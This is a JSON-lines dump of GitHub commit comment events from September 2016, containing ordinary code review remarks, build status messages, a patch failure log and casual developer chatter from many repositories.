{"id":"4573325675","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19052157,"position":null,"line":null,"path":null,"commit_id":"19ecff79eb272c295361c951fd8f4e92545856c4","created_at":"2016-09-16T10:36:51Z","updated_at":"2016-09-16T10:36:51Z","body":"1. I was attempting to let the user hide certain columns of the database by selecting certain checkboxes, then reloading the table. I think my approach was quite bad so I'll try again using JS instead of blade conditionals.\r\n2. Line 14 of ```HideColumnsForm```. I can't seem to find any options to manipulate the label in the laravel-form-builder docs. "}},"created_at":"2016-09-16T10:36:51Z"}
{"id":"4573325874","type":"CommitCommentEvent","actor":{"login":"slluis"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19052159,"position":null,"line":null,"path":null,"commit_id":"9804bbc9dae393e03f1750ab50807d326be0e980","created_at":"2016-09-16T10:36:54Z","updated_at":"2016-09-16T10:36:54Z","body":"It fixes a buffer overflow. I'm not sure how this can be unit tested."}},"created_at":"2016-09-16T10:36:54Z"}
{"id":"4573326343","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19052160,"position":null,"line":null,"path":null,"commit_id":"5c84e11cab8d608082f0cc556ec8c9919c3b066d","created_at":"2016-09-16T10:37:02Z","updated_at":"2016-09-16T10:37:02Z","body":"Git本地提交到GitHub后乱码的解决方法：\r\nWindows 下用 notepad++ 打开文件，选择 utf8无DOM保存，再重新提交即可"}},"created_at":"2016-09-16T10:37:02Z"}
{"id":"4573327806","type":"CommitCommentEvent","actor":{"login":"AshrafShaikh"},"repo":{"name":"mgp25/WART"},"payload":{"comment":{"id":19052168,"position":null,"line":null,"path":null,"commit_id":"f4d1278f3dac4989881f6ac6271e8a68dbb1e272","created_at":"2016-09-16T10:37:24Z","updated_at":"2016-09-16T10:37:24Z","body":"I am using this WART tool.\r\nIt shows me error as below\r\nCould not request code using either sms or voice \r\nsms:{\"Status\":\"fail\",\"reason\":\"bad_token\"}\r\nvoice:{\"Status\":\"fail\",\"reason\":\"bad_token\"}"}},"created_at":"2016-09-16T10:37:24Z"}
{"id":"4573331975","type":"CommitCommentEvent","actor":{"login":"SarthakNarang"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19052181,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-16T10:38:29Z","updated_at":"2016-09-16T10:38:29Z","body":"@akhilnarang With some tea or coffee may be? *_*"}},"created_at":"2016-09-16T10:38:29Z"}
{"id":"4573334640","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"rtyx/Exercises"},"payload":{"comment":{"id":19052184,"position":22,"line":22,"path":"wk3/day4/w3d4exer1.js","commit_id":"f6c70b98ed981f1f90786b26388a669ebd706cb2","created_at":"2016-09-16T10:39:10Z","updated_at":"2016-09-16T10:39:10Z","body":"LGTM!"}},"created_at":"2016-09-16T10:39:10Z"}
{"id":"4573336615","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"rtyx/Exercises"},"payload":{"comment":{"id":19052188,"position":5,"line":5,"path":"wk3/day4/script.js","commit_id":"f6c70b98ed981f1f90786b26388a669ebd706cb2","created_at":"2016-09-16T10:39:41Z","updated_at":"2016-09-16T10:39:41Z","body":"nice touch :)"}},"created_at":"2016-09-16T10:39:41Z"}
{"id":"4573338354","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"rtyx/Exercises"},"payload":{"comment":{"id":19052191,"position":17,"line":17,"path":"wk3/day4/script.js","commit_id":"f6c70b98ed981f1f90786b26388a669ebd706cb2","created_at":"2016-09-16T10:40:09Z","updated_at":"2016-09-16T10:40:09Z","body":"LGTM!"}},"created_at":"2016-09-16T10:40:09Z"}
{"id":"4573339200","type":"CommitCommentEvent","actor":{"login":"yairpatch"},"repo":{"name":"yairpatch/android_device_lge_g3-common"},"payload":{"comment":{"id":19052193,"position":null,"line":null,"path":null,"commit_id":"158caa12bc4d59e7e4f5b39ad3ae0ae6d243d95b","created_at":"2016-09-16T10:40:21Z","updated_at":"2016-09-16T10:40:21Z","body":"you can use it for aosp base ROM"}},"created_at":"2016-09-16T10:40:21Z"}
{"id":"4573341586","type":"CommitCommentEvent","actor":{"login":"XfortunaX"},"repo":{"name":"XfortunaX/lab2_repo"},"payload":{"comment":{"id":19052194,"position":null,"line":null,"path":null,"commit_id":"dc3e05c825414e80ec7ee93a53d1052602bfab64","created_at":"2016-09-16T10:40:54Z","updated_at":"2016-09-16T10:40:54Z","body":"Lab2_RIP"}},"created_at":"2016-09-16T10:40:54Z"}
{"id":"4573341771","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"thiloo/code"},"payload":{"comment":{"id":19052195,"position":27,"line":27,"path":"wk3/thurEx1.js","commit_id":"41eca1cb90203e662f060bcc792d7aa87af7ffb6","created_at":"2016-09-16T10:40:57Z","updated_at":"2016-09-16T10:40:57Z","body":"LGTM"}},"created_at":"2016-09-16T10:40:57Z"}
{"id":"4573347631","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"thiloo/code"},"payload":{"comment":{"id":19052207,"position":11,"line":11,"path":"wk3/thurEx2.js","commit_id":"41eca1cb90203e662f060bcc792d7aa87af7ffb6","created_at":"2016-09-16T10:42:27Z","updated_at":"2016-09-16T10:42:27Z","body":"you should store the reference to this field outside of the click handler function so it doesn't need to be calculated every time the user clicks."}},"created_at":"2016-09-16T10:42:27Z"}
{"id":"4573354797","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19052229,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-16T10:44:17Z","updated_at":"2016-09-16T10:44:17Z","body":"Milkshake🙌\n\nOn Sep 16, 2016 4:08 PM, \"Sarthak Narang\" <notifications@github.com> wrote:\n\n> @akhilnarang <https://github.com/akhilnarang> With some tea or coffee may\n> be? *_*\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sud-vastav/android_device_oneplus_onyx/commit/36966fd3a7caced28fea663d77847f55dad7a71c#commitcomment-19052181>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJpnfcIAuusm7fr4N2Q3suhbJSxhQzZCks5qqnGmgaJpZM4J-Jtr>\n> .\n>\n"}},"created_at":"2016-09-16T10:44:17Z"}
{"id":"4573354825","type":"CommitCommentEvent","actor":{"login":"arturnista"},"repo":{"name":"arturnista/trutasforum"},"payload":{"comment":{"id":19052230,"position":5,"line":12,"path":"public/css/index.css","commit_id":"d99141b6864d47bf6cb27cdb05828334dd035bb3","created_at":"2016-09-16T10:44:18Z","updated_at":"2016-09-16T10:44:18Z","body":"Ficou legal isso. Parabans"}},"created_at":"2016-09-16T10:44:18Z"}
{"id":"4573355078","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"thiloo/code"},"payload":{"comment":{"id":19052232,"position":22,"line":22,"path":"wk3/thurEx2.js","commit_id":"41eca1cb90203e662f060bcc792d7aa87af7ffb6","created_at":"2016-09-16T10:44:21Z","updated_at":"2016-09-16T10:44:21Z","body":"nitpick: \"validate\" is not a good name for an input field id; it sound more like a function. in the same vein, \"result\" is not a good name for a function because it doesn't describe what the function does."}},"created_at":"2016-09-16T10:44:21Z"}
{"id":"4573355719","type":"CommitCommentEvent","actor":{"login":"arturnista"},"repo":{"name":"arturnista/trutasforum"},"payload":{"comment":{"id":19052236,"position":5,"line":12,"path":"public/css/index.css","commit_id":"d99141b6864d47bf6cb27cdb05828334dd035bb3","created_at":"2016-09-16T10:44:31Z","updated_at":"2016-09-16T10:44:31Z","body":"Eu sei, obrigado\r\n"}},"created_at":"2016-09-16T10:44:31Z"}
{"id":"4573359706","type":"CommitCommentEvent","actor":{"login":"franbenz"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19052242,"position":23,"line":35,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-16T10:45:31Z","updated_at":"2016-09-16T10:45:31Z","body":"@tolyo @soumak77 is the build expected to fail on lint errors on other files, for example home-controller.js? \r\nI think the pattern is ignoring all other files."}},"created_at":"2016-09-16T10:45:31Z"}
{"id":"4573359830","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"thc202/zaproxy"},"payload":{"comment":{"id":19052243,"position":null,"line":null,"path":null,"commit_id":"2f02d65da928e89eede66921ac751095b22b80e2","created_at":"2016-09-16T10:45:33Z","updated_at":"2016-09-16T10:45:33Z","body":"Looks good "}},"created_at":"2016-09-16T10:45:33Z"}
{"id":"4573360961","type":"CommitCommentEvent","actor":{"login":"knocte"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19052246,"position":null,"line":null,"path":null,"commit_id":"9804bbc9dae393e03f1750ab50807d326be0e980","created_at":"2016-09-16T10:45:52Z","updated_at":"2016-09-16T10:45:52Z","body":"The API is public :) how about a test that sends the 2 offending strings that were causing the exception :P"}},"created_at":"2016-09-16T10:45:52Z"}
{"id":"4573365685","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":19052257,"position":17,"line":17,"path":"wk3/Random-word.js","commit_id":"ee3041f90d74987b374a13cd5665db3eae7e8a0a","created_at":"2016-09-16T10:47:07Z","updated_at":"2016-09-16T10:47:07Z","body":"the code in this block wouldn't throw an error because referring to a non-existent property of an object returns `undefined`"}},"created_at":"2016-09-16T10:47:07Z"}
{"id":"4573369329","type":"CommitCommentEvent","actor":{"login":"ubergesundheit"},"repo":{"name":"sensebox/sensebox.github.io"},"payload":{"comment":{"id":19052270,"position":null,"line":null,"path":null,"commit_id":"27477a93594fc750df649d60c5adc8ccefe36f0c","created_at":"2016-09-16T10:48:03Z","updated_at":"2016-09-16T10:48:03Z","body":"@felixerdy gibts da keinen Direktlink zum Artikel?"}},"created_at":"2016-09-16T10:48:03Z"}
{"id":"4573372604","type":"CommitCommentEvent","actor":{"login":"KroArtem"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":19052274,"position":null,"line":null,"path":null,"commit_id":"fdca75b4b0c134ea41f1c819f83bf3c38eceb889","created_at":"2016-09-16T10:48:53Z","updated_at":"2016-09-16T10:48:53Z","body":"internationalization (i18n) != localization (l10n)"}},"created_at":"2016-09-16T10:48:53Z"}
{"id":"4573374832","type":"CommitCommentEvent","actor":{"login":"Faballion"},"repo":{"name":"Faballion/TestRepo"},"payload":{"comment":{"id":19052280,"position":null,"line":null,"path":null,"commit_id":"98ad4d054d8a81ab374b6e4eda3484c5a09fe6ea","created_at":"2016-09-16T10:49:25Z","updated_at":"2016-09-16T10:49:25Z","body":"Checking out a comment on github"}},"created_at":"2016-09-16T10:49:25Z"}
{"id":"4573374839","type":"CommitCommentEvent","actor":{"login":"monsterinkbless"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19052278,"position":34,"line":34,"path":"Translations/Console/translation.th.json","commit_id":"2b176b54cc9b2d42ad1abc415c071cab3fe8b14d","created_at":"2016-09-16T10:49:25Z","updated_at":"2016-09-16T10:49:25Z","body":" \"Value\": \"ชื่อ: {0}, ค่าประสบการณ์: {1}, อัญมณี: {2}, ไอเทม: {3}\""}},"created_at":"2016-09-16T10:49:25Z"}
{"id":"4573377081","type":"CommitCommentEvent","actor":{"login":"exoji2e"},"repo":{"name":"patrik-laurell/edan55-labs"},"payload":{"comment":{"id":19052283,"position":null,"line":null,"path":null,"commit_id":"964f8b634f5f7cc0efe014c29dc5e325abd3c277","created_at":"2016-09-16T10:50:01Z","updated_at":"2016-09-16T10:50:01Z","body":"Probably a good idea to move this to GitLab dude.. "}},"created_at":"2016-09-16T10:50:01Z"}
{"id":"4573379154","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"juliendubrail/julien_spices"},"payload":{"comment":{"id":19052284,"position":19,"line":19,"path":"wk3/germannumber.js","commit_id":"56921a0a50692dab68d453868de4b68d4cdbb8e9","created_at":"2016-09-16T10:50:31Z","updated_at":"2016-09-16T10:50:31Z","body":"variable names should only be capitalized if they are constructor functions."}},"created_at":"2016-09-16T10:50:31Z"}
{"id":"4573385503","type":"CommitCommentEvent","actor":{"login":"tebjan"},"repo":{"name":"microdee/VVVV.OpenVR"},"payload":{"comment":{"id":19052302,"position":29,"line":29,"path":"src/VVVV.OpenVR.Nodes/Nodes/OpenVRProducerNode.cs","commit_id":"f62aa3c9d0d0c7ab6dc3fd90d36248a8a4d6212b","created_at":"2016-09-16T10:52:03Z","updated_at":"2016-09-16T10:52:03Z","body":"cool, thanks a lot!"}},"created_at":"2016-09-16T10:52:03Z"}
{"id":"4573387412","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"juliendubrail/julien_spices"},"payload":{"comment":{"id":19052309,"position":10,"line":10,"path":"wk3/jsonvalidator.js","commit_id":"56921a0a50692dab68d453868de4b68d4cdbb8e9","created_at":"2016-09-16T10:52:30Z","updated_at":"2016-09-16T10:52:30Z","body":"`alert` doesn't have a return value, so there is nothing to save here."}},"created_at":"2016-09-16T10:52:30Z"}
{"id":"4573389684","type":"CommitCommentEvent","actor":{"login":"Plamen5kov"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19052312,"position":19,"line":1052,"path":"runtime/src/main/jni/CallbackHandlers.cpp","commit_id":"d4f6b1862a0fc9be8ee6de76df9143775268e765","created_at":"2016-09-16T10:53:03Z","updated_at":"2016-09-16T10:53:03Z","body":"It's best to move this line after `env.CallStaticVoidMethod(RUNTIME_CLASS, mId, id);`(a couple of rows down), so we can be sure if something fails in the JNI call, we still haven't set the `isTerminated` value to true. Just in case of future refactoring of the method \"workerObjectTerminate\""}},"created_at":"2016-09-16T10:53:03Z"}
{"id":"4573389850","type":"CommitCommentEvent","actor":{"login":"schubertzhang"},"repo":{"name":"schubertzhang/hellothrift"},"payload":{"comment":{"id":19052313,"position":4,"line":4,"path":"lib/README.TXT","commit_id":"8abb0e52d2043247e954abafcba08038e2e14ed0","created_at":"2016-09-16T10:53:07Z","updated_at":"2016-09-16T10:53:07Z","body":"test codereview"}},"created_at":"2016-09-16T10:53:07Z"}
{"id":"4573391604","type":"CommitCommentEvent","actor":{"login":"Coneko"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":19052315,"position":32,"line":32,"path":"src/com/facebook/buck/util/DefaultPropertyFinder.java","commit_id":"849e68a61002a878f92c6ced219d1089268950c3","created_at":"2016-09-16T10:53:33Z","updated_at":"2016-09-16T10:53:33Z","body":"What do you mean? Did you find leftover references?"}},"created_at":"2016-09-16T10:53:33Z"}
{"id":"4573393631","type":"CommitCommentEvent","actor":{"login":"gargmegha"},"repo":{"name":"gargmegha/First-"},"payload":{"comment":{"id":19052322,"position":null,"line":null,"path":null,"commit_id":"cbe8cc4717472d230b2ca54528fb72926fc28ea7","created_at":"2016-09-16T10:54:05Z","updated_at":"2016-09-16T10:54:05Z","body":"Tacos"}},"created_at":"2016-09-16T10:54:05Z"}
{"id":"4573403055","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"fredpinon/Fred"},"payload":{"comment":{"id":19052346,"position":28,"line":28,"path":"wk3/JSON_validator/javascript.js","commit_id":"cc9398eb6d9ee1c97168b60631b48c22868c0a61","created_at":"2016-09-16T10:56:25Z","updated_at":"2016-09-16T10:56:25Z","body":"the whole thing works, but accidentally ;)\r\nif `JSON.parse` throws an error because the JSON is not valid, you never get to line 7. and everything from line 11 will never happen in any case."}},"created_at":"2016-09-16T10:56:25Z"}
{"id":"4573404188","type":"CommitCommentEvent","actor":{"login":"littlebalup"},"repo":{"name":"soarqin/vitasdk-msys2"},"payload":{"comment":{"id":19052348,"position":null,"line":null,"path":null,"commit_id":"13b3613c1290cd34e30f864acdce67e4fe6df5f6","created_at":"2016-09-16T10:56:41Z","updated_at":"2016-09-16T10:56:41Z","body":"seems binutils patchs have to be updated as well:\r\n\r\n`[Step 4] Build binutils...\r\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n                                 Dload  Upload   Total   Spent    Left  Speed\r\n100 24.4M  100 24.4M    0     0   931k      0  0:00:26  0:00:26 --:--:-- 1224k\r\npatching file ld/scripttempl/elf.sc\r\nHunk #1 succeeded at 553 with fuzz 2 (offset 17 lines).\r\npatching file bfd/bfd-in.h\r\npatching file bfd/bfd-in2.h\r\npatching file binutils/bucomm.c\r\nHunk #1 FAILED at 570.\r\nHunk #2 FAILED at 579.\r\n2 out of 2 hunks FAILED -- saving rejects to file binutils/bucomm.c.rej\r\npatching file binutils/dwarf.c\r\npatching file binutils/elfedit.c\r\nHunk #1 succeeded at 483 (offset 42 lines).\r\nHunk #2 succeeded at 505 (offset 42 lines).\r\npatching file binutils/nm.c\r\npatching file binutils/prdbg.c\r\npatching file binutils/readelf.c\r\nHunk #1 succeeded at 1150 (offset 27 lines).\r\nHunk #2 succeeded at 12174 (offset 622 lines).\r\nHunk #3 succeeded at 16493 (offset 932 lines).\r\nHunk #4 succeeded at 16512 (offset 932 lines).\r\npatching file binutils/strings.c\r\nHunk #1 succeeded at 595 (offset 13 lines).\r\nHunk #2 succeeded at 614 (offset 13 lines).\r\nHunk #3 succeeded at 633 (offset 13 lines).\r\npatching file gas/as.h\r\npatching file gas/read.c\r\nHunk #1 succeeded at 4352 (offset 30 lines).\r\npatching file gold/configure\r\nHunk #1 succeeded at 7489 (offset -64 lines).\r\npatching file gold/configure.ac\r\nHunk #1 succeeded at 616 (offset 1 line).\r\npatching file include/ansidecl.h\r\nHunk #1 succeeded at 195 (offset -2 lines).\r\nHunk #2 succeeded at 223 (offset -2 lines).\r\npatching file libiberty/configure\r\nHunk #1 succeeded at 5718 (offset 324 lines).\r\nHunk #2 succeeded at 6084 (offset 364 lines).\r\nHunk #3 succeeded at 6224 (offset 364 lines).\r\nHunk #4 succeeded at 6691 (offset 370 lines).\r\npatching file libiberty/configure.ac\r\nHunk #1 succeeded at 382 (offset 10 lines).\r\nHunk #2 succeeded at 482 (offset 10 lines).\r\nHunk #3 succeeded at 492 (offset 10 lines).\r\nHunk #4 succeeded at 645 (offset 16 lines).\r\npatching file libiberty/Makefile.in\r\nHunk #1 succeeded at 131 (offset 1 line).\r\nHunk #2 FAILED at 155.\r\nHunk #3 succeeded at 174 (offset 2 lines).\r\nHunk #4 FAILED at 221.\r\n2 out of 4 hunks FAILED -- saving rejects to file libiberty/Makefile.in.rej\r\n`"}},"created_at":"2016-09-16T10:56:41Z"}
{"id":"4573408680","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19052357,"position":null,"line":null,"path":null,"commit_id":"b83c24262925fc56badc63f2d164f996b7a41329","created_at":"2016-09-16T10:57:50Z","updated_at":"2016-09-16T10:57:50Z","body":"Java多态的体现\r\n子类继承父类后，的确可以自动向上转型。但是任何域的访问操作都是由编译器解析的，因此对于 \"域\" 来讲并非多态的。"}},"created_at":"2016-09-16T10:57:50Z"}
{"id":"4573410420","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19052363,"position":null,"line":null,"path":null,"commit_id":"52d95b3d8a797b8af68a7fa908eb09ee679a5d2e","created_at":"2016-09-16T10:58:18Z","updated_at":"2016-09-16T10:58:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1017](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13417&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T10:58:18Z"}
{"id":"4573411907","type":"CommitCommentEvent","actor":{"login":"tolyo"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19052365,"position":23,"line":35,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-16T10:58:40Z","updated_at":"2016-09-16T10:58:40Z","body":"@franbenz Fixed"}},"created_at":"2016-09-16T10:58:40Z"}
{"id":"4573418899","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19052381,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-16T11:00:25Z","updated_at":"2016-09-16T11:00:25Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.169](http://build.clear-measure.com/viewLog.html?buildId=10461&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-16T11:00:25Z"}
{"id":"4573422405","type":"CommitCommentEvent","actor":{"login":"LinuxBars"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":19052387,"position":null,"line":null,"path":null,"commit_id":"891e570730484ed4ff217ba6cb3a99bb4cc01941","created_at":"2016-09-16T11:01:15Z","updated_at":"2016-09-16T11:01:15Z","body":"哈哈，不辛苦。英文不太好，正好借此提升一下。\n\n\n发自网易邮箱大师\n在2016年09月16日 13:17，Xingyu.Wang 写道:\nPUB:20160824 Baidu Takes FPGA Approach to Accelerating SQL at Scale\n\n@LinuxBars 这篇比较晦涩，句式也比较复杂，还涉及到很多特有的技术细节，翻译不容易，辛苦了。\n\n--\nYou are receiving this because you were mentioned.\nReply to this email directly or view it on GitHub:\nhttps://github.com/LCTT/TranslateProject/commit/891e570730484ed4ff217ba6cb3a99bb4cc01941"}},"created_at":"2016-09-16T11:01:15Z"}
{"id":"4573422981","type":"CommitCommentEvent","actor":{"login":"mkonik"},"repo":{"name":"mkonik/st-e"},"payload":{"comment":{"id":19052391,"position":null,"line":null,"path":null,"commit_id":"5958d588d4e3bd97487bf01a1a4f517efa7e9213","created_at":"2016-09-16T11:01:24Z","updated_at":"2016-09-16T11:01:24Z","body":"This is a stupid comment"}},"created_at":"2016-09-16T11:01:24Z"}
{"id":"4573424025","type":"CommitCommentEvent","actor":{"login":"mkonik"},"repo":{"name":"mkonik/st-e"},"payload":{"comment":{"id":19052392,"position":4,"line":27,"path":"St_E_022_Badz_wesola.krn","commit_id":"5958d588d4e3bd97487bf01a1a4f517efa7e9213","created_at":"2016-09-16T11:01:39Z","updated_at":"2016-09-16T11:01:39Z","body":"I do not agree"}},"created_at":"2016-09-16T11:01:39Z"}
{"id":"4573425450","type":"CommitCommentEvent","actor":{"login":"onderkalaci"},"repo":{"name":"citusdata/citus"},"payload":{"comment":{"id":19052396,"position":26,"line":26,"path":"src/backend/distributed/utils/colocation_utils.c","commit_id":"4756d6797a1f0c925c66122f3a07c4f6dc31e549","created_at":"2016-09-16T11:02:02Z","updated_at":"2016-09-16T11:02:02Z","body":"This function errors out if the table is not distributed. So, we may want to update function comment so that the caller should not use this function for non-distributed tables?"}},"created_at":"2016-09-16T11:02:02Z"}
{"id":"4573426192","type":"CommitCommentEvent","actor":{"login":"onderkalaci"},"repo":{"name":"citusdata/citus"},"payload":{"comment":{"id":19052401,"position":37,"line":37,"path":"src/backend/distributed/utils/colocation_utils.c","commit_id":"4756d6797a1f0c925c66122f3a07c4f6dc31e549","created_at":"2016-09-16T11:02:12Z","updated_at":"2016-09-16T11:02:12Z","body":"In general, we don't have a convention of using numbers in the variable names. \r\nWe might pick a similar naming convention as in `ShardIntervalsMatch((List *leftShardIntervalList, List *rightShardIntervalList);)`. Such as, leftDistributedTable <=> rightDistributedTable? or maybe `firstDistributedTable` and `secondDistributedTable`? \r\n\r\nThen, we should probably want to update other functions and variables as well."}},"created_at":"2016-09-16T11:02:12Z"}
{"id":"4573426431","type":"CommitCommentEvent","actor":{"login":"onderkalaci"},"repo":{"name":"citusdata/citus"},"payload":{"comment":{"id":19052402,"position":41,"line":41,"path":"src/backend/distributed/utils/colocation_utils.c","commit_id":"4756d6797a1f0c925c66122f3a07c4f6dc31e549","created_at":"2016-09-16T11:02:15Z","updated_at":"2016-09-16T11:02:15Z","body":"extra new line"}},"created_at":"2016-09-16T11:02:15Z"}
{"id":"4573426985","type":"CommitCommentEvent","actor":{"login":"onderkalaci"},"repo":{"name":"citusdata/citus"},"payload":{"comment":{"id":19052404,"position":59,"line":59,"path":"src/backend/distributed/utils/colocation_utils.c","commit_id":"4756d6797a1f0c925c66122f3a07c4f6dc31e549","created_at":"2016-09-16T11:02:22Z","updated_at":"2016-09-16T11:02:22Z","body":"`DatumGetInt32` only applies for hash partitioned tables. So, it might be more convenient if we re-order the function such that we first check whether the tables are colocated (which implies hash-partitioning) and then get the values. In that case, we never return true for non-hash partitioned tables."}},"created_at":"2016-09-16T11:02:22Z"}
{"id":"4573427221","type":"CommitCommentEvent","actor":{"login":"onderkalaci"},"repo":{"name":"citusdata/citus"},"payload":{"comment":{"id":19052405,"position":66,"line":66,"path":"src/backend/distributed/utils/colocation_utils.c","commit_id":"4756d6797a1f0c925c66122f3a07c4f6dc31e549","created_at":"2016-09-16T11:02:26Z","updated_at":"2016-09-16T11:02:26Z","body":"maybe use `tablesColocated` as the variable name?\r\nAnd, `minValuesEqual` 'maxValuesEqual' ?"}},"created_at":"2016-09-16T11:02:26Z"}
{"id":"4573428460","type":"CommitCommentEvent","actor":{"login":"rreitmann"},"repo":{"name":"dzhw/metadatamanagement"},"payload":{"comment":{"id":19052407,"position":null,"line":null,"path":null,"commit_id":"b4f590a0ab9711f900e0abfc22ba9705536aab39","created_at":"2016-09-16T11:02:44Z","updated_at":"2016-09-16T11:02:44Z","body":"Please refactor the tabs object so that the elasticSearchType becomes the key. This avoids iterating over the array again and again. It should look like this:\r\n`{\r\n      'variables' : {title: 'search-management.tabs.variables',\r\n      inputLabel: 'search-management.input-label.variables',\r\n      icon: 'assets/images/icons/variable.svg',\r\n      count: null,\r\n      acceptedFileUploadType: 'application/zip',\r\n      uploadFunction: $scope.uploadVariables\r\n      },...\r\n}`\r\n"}},"created_at":"2016-09-16T11:02:44Z"}
{"id":"4573429680","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19052411,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-16T11:03:03Z","updated_at":"2016-09-16T11:03:03Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.169](http://build.clear-measure.com/viewLog.html?buildId=10461&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:38"}},"created_at":"2016-09-16T11:03:03Z"}
{"id":"4573431314","type":"CommitCommentEvent","actor":{"login":"kofedorenko"},"repo":{"name":"masha-feilyk/Bright"},"payload":{"comment":{"id":19052417,"position":10,"line":67,"path":"css/main.css","commit_id":"4d78175c6f06d5a170d0503a7d7a26de7e10ff64","created_at":"2016-09-16T11:03:29Z","updated_at":"2016-09-16T11:03:29Z","body":"Объедини 4 свойства в одно"}},"created_at":"2016-09-16T11:03:29Z"}
{"id":"4573432790","type":"CommitCommentEvent","actor":{"login":"seut"},"repo":{"name":"crate/crate"},"payload":{"comment":{"id":19052420,"position":5,"line":9,"path":"CHANGES.txt","commit_id":"a4957e5b92d1676773e3ee04bf7fd4a680eb00f8","created_at":"2016-09-16T11:03:52Z","updated_at":"2016-09-16T11:03:52Z","body":"...did fail"}},"created_at":"2016-09-16T11:03:52Z"}
{"id":"4573434317","type":"CommitCommentEvent","actor":{"login":"seut"},"repo":{"name":"crate/crate"},"payload":{"comment":{"id":19052424,"position":5,"line":9,"path":"CHANGES.txt","commit_id":"a4957e5b92d1676773e3ee04bf7fd4a680eb00f8","created_at":"2016-09-16T11:04:17Z","updated_at":"2016-09-16T11:04:17Z","body":"or ... failed ;)"}},"created_at":"2016-09-16T11:04:17Z"}
{"id":"4573438349","type":"CommitCommentEvent","actor":{"login":"ozra"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":19052436,"position":null,"line":null,"path":null,"commit_id":"611849c8bbb01d94d7b668675f5a916a9a75bcaf","created_at":"2016-09-16T11:05:19Z","updated_at":"2016-09-16T11:05:19Z","body":":+1:"}},"created_at":"2016-09-16T11:05:19Z"}
{"id":"4573440280","type":"CommitCommentEvent","actor":{"login":"Writtic"},"repo":{"name":"ENOW-IJI/storm"},"payload":{"comment":{"id":19052440,"position":null,"line":null,"path":null,"commit_id":"e51a7f16a178ee2e5c871c8d4461c06674f8e6ba","created_at":"2016-09-16T11:05:52Z","updated_at":"2016-09-16T11:05:52Z","body":"#10 "}},"created_at":"2016-09-16T11:05:52Z"}
{"id":"4573441050","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"anael-seghezzi/CToy"},"payload":{"comment":{"id":19052443,"position":null,"line":null,"path":null,"commit_id":"878c53eb38c2320db1bb698da6a8a8cb08b85cec","created_at":"2016-09-16T11:06:04Z","updated_at":"2016-09-16T11:06:04Z","body":"Would any other commit message be more useful to inform your users better about the desired software change?"}},"created_at":"2016-09-16T11:06:04Z"}
